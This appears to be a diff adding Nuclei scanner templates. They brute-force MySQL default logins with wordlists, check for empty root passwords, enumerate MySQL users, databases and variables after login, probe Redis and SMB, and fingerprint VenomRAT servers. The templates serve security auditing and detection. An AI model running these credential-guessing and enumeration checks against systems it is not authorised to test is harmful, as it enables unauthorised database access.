let m = require('nuclei/mysql');
let c = m.MySQLClient();
let result = c.ConnectWithDB(Host,Port,User,Pass,dbName);
result;
args:
Host: "{{Host}}"
Port: "3306"
dbName: "{{db}}"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
stop-at-first-match: true
payloads:
db:
- information_schema
- performance_schema
- mysql
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and

44
javascript/mysql/mysql-default-login.yaml Normal file
View File

@ -0,0 +1,44 @@
id: mysql-default-login
info:
name: MySQL - Default Login
author: DhiyaneshDk,pussycat0x,ritikchaddha
severity: high
description: |
A MySQL service was accessed with easily guessed credentials.
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,default-login,network,fuzz
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,Username,Password)
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and

45
javascript/mysql/mysql-show-variables.yaml Normal file
View File

@ -0,0 +1,45 @@
id: mysql-show-variables
info:
name: MySQL - Show Variables
author: DhiyaneshDk
severity: high
description: Attempts to show all variables on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-variables.html
metadata:
shodan-query: port:3306
tags: js,mysql,network,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
log(to_json(response));
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
Query: "show variables;"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].Variable_name'

47
javascript/mysql/mysql-user-enum.yaml Normal file
View File

@ -0,0 +1,47 @@
id: mysql-user-enum
info:
name: MySQL - User Enumeration
author: pussycat0x
severity: high
description: |
Attempts to list all users on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-users.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,enum,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "SELECT DISTINCT user FROM mysql.user;"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].user'

41
javascript/network/mysql/mysql-empty-password.yaml Normal file
View File

@ -0,0 +1,41 @@
id: mysql-empty-password
info:
name: MySQL - Empty Password
author: DhiyaneshDk
severity: high
description: |
Checks for MySQL servers with an empty password for root or anonymous.
metadata:
shodan-query: port:3306
tags: js,mssql,network
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,User,Pass)
args:
Host: "{{Host}}"
Port: "3306"
User: "{{username}}"
Pass: " "
payloads:
usernames:
- root
- anonymous
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and

45
javascript/network/mysql/mysql-show-databases.yaml Normal file
View File

@ -0,0 +1,45 @@
id: mysql-show-databases
info:
name: MySQL - Show Databases
author: DhiyaneshDk
severity: high
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "show databases;"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database

39
javascript/network/redis/redis-info.yaml Normal file
View File

@ -0,0 +1,39 @@
id: redis-info
info:
name: Redis Info - Detect
author: DhiyaneshDK
severity: info
description: |
Retrieves information (such as version number and architecture) from a Redis key-value store.
reference:
- https://nmap.org/nsedoc/scripts/redis-info.html
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const info = redis.GetServerInfo(Host,Port);
Export(info);
args:
Host: "{{Host}}"
Port: "6379"
extractors:
- type: regex
part: response
regex:
- redis_version:(\d+\.\d+\.\d+)
- os:(.*?)\\r\\n
- arch_bits:(\d+)\s+bits
- process_id:(\d+)
- used_cpu_sys:(\d+\.\d+)
- used_cpu_user:(\d+\.\d+)
- connected_clients:(\d+)
- connected_slaves:(\d+)
- used_memory_human:(\d+\.\d+[KMGTPEZY]?)
- role:(\w+)

29
javascript/network/redis/redis-require-auth.yaml Normal file
View File

@ -0,0 +1,29 @@
id: redis-require-auth
info:
name: Redis Require Authentication - Detect
author: DhiyaneshDK
severity: info
description: |
IsAuthenticated checks if the redis server requires authentication
reference:
- https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated(Host,Port);
Export(isAuthenticated);
args:
Host: "{{Host}}"
Port: "6379"
matchers:
- type: dsl
dsl:
- "success == true"

38
javascript/network/smb/smb2-server-time.yaml Normal file
View File

@ -0,0 +1,38 @@
id: smb2-server-time
info:
name: SMB2 Server Time - Detection
author: DhiyaneshDK
severity: info
description: |
Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
reference:
- https://nmap.org/nsedoc/scripts/smb2-time.html
metadata:
shodan-query: "port:445"
verified: true
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ConnectSMBInfoMode(Host,Port);
var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
result
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- success
extractors:
- type: dsl
dsl:
- response

26
ssl/c2/venomrat.yaml Normal file
View File

@ -0,0 +1,26 @@
id: venomrat
info:
name: VenomRAT - Detect
author: pussycat0x
severity: info
reference:
- https://twitter.com/v0lundr_/status/1727277517659353297
metadata:
verified: "true"
max-request: 1
fofa-query: cert.issuer.cn="VenomRAT Server"
tags: c2,ir,osint,malware,ssl,venomrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
- type: word
part: issuer_cn
words:
- "VenomRAT Server"
extractors:
- type: json
json:
- ".issuer_cn"